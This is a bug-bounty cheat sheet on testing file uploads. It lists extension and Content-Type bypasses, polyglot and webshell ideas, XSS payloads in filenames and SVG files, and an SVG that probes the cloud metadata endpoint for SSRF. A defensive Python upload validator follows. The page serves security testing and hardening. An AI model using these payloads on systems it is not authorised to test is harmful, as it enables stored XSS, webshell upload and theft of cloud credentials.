zseano:file_uploads
File Upload Testing
File uploads are often filtered on extension, content-type, magic bytes, or image dimensions. Test each layer separately.
Extension Tricks
shell.php/.jpg          # server may strip after slash
shell.html%0d%0a.jpg    # newline truncation
.txt, .svg, .xml        # often forgotten in filters
shell.php5, shell.phtml # alternate PHP extensions
Content-Type Manipulation
- Filename .jpg but Content-Type text/html
- No filename or no extension – check what the server defaults to
- Keep image magic bytes (\xff\xd8\xff) at start but append PHP/HTML after
- Polyglot files – simultaneously valid image and valid HTML/PHP
XSS in Filenames
58832_300x300.jpg<svg onload=confirm()>
"><img src=x onerror=alert(1)>.jpg
What to Check
- Where are uploaded files stored? Same domain? CDN? Check CSP header
- What validation is in place? Extension, content-type, magic bytes, image dimensions
- Is there a virus scanner? Can you bypass it with a polyglot?
- Is the upload endpoint authenticated? Try uploading unauthenticated
SVG XSS
SVG files are XML and support JavaScript event handlers:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <rect width="100" height="100"/>
</svg>
Escalation
- SVG upload on same domain = XSS
- Unrestricted file type = webshell if server executes
- XSS in filename reflected in admin upload logs = blind XSS
- SSRF via SVG:
<svg><image href="http://169.254.169.254/"/></svg>
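A server-side validator that checks every layer this page probes (filename path and newline tricks, last-extension allowlist, Content-Type agreement, magic bytes, appended active content, and a server-chosen stored name so filename XSS never reaches logs or HTML). This is an added example for this page, not code from zseano's notes; the allowlist, the marker list and the function name are assumptions.

```python
import re
import secrets

# Allowlist of extension -> (expected magic bytes, Content-Type to serve with).
# SVG is deliberately absent: it is XML and can carry event handlers.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "gif":  (b"GIF8", "image/gif"),
}
# Markers of active content that has no business inside a served image.
ACTIVE_MARKERS = (b"<?php", b"<script", b"<svg", b"onload=", b"onerror=")


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (ok, reason, stored_name, serve_type)."""
    # 1. Filename: keep only the final path component ourselves, so
    #    "shell.php/.jpg" is judged as ".jpg" rather than left to the server.
    name = re.split(r"[\\/]", filename)[-1]
    # Reject leading-dot names, CR/LF and any other control or markup
    # characters (newline truncation, XSS in filename).
    if not name or name.startswith(".") or not re.fullmatch(r"[A-Za-z0-9._-]+", name):
        return (False, "bad filename", None, None)
    # 2. Extension: only the last one counts, compared case-insensitively.
    #    Double extensions are harmless because the stored name is ours (step 6).
    ext = name.rpartition(".")[2].lower()
    if ext not in ALLOWED:
        return (False, "extension not allowed", None, None)
    magic, serve_type = ALLOWED[ext]
    # 3. Client Content-Type must agree with the extension; it is never
    #    trusted alone and never echoed back when the file is served.
    if content_type.split(";")[0].strip().lower() != serve_type:
        return (False, "content-type mismatch", None, None)
    # 4. Magic bytes must match the allowed type.
    if not data.startswith(magic):
        return (False, "magic bytes mismatch", None, None)
    # 5. Defence in depth against polyglots (valid image header, script or
    #    PHP appended). Production code should additionally re-encode the
    #    image with an image library so foreign trailing bytes are dropped.
    low = data.lower()
    if any(m in low for m in ACTIVE_MARKERS):
        return (False, "active content in body", None, None)
    # 6. Store under a random server-chosen name; the user-supplied filename
    #    is never written to disk, logs or HTML.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return (True, "ok", stored, serve_type)
```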
zseano/file_uploads.txt · Last modified: by drew
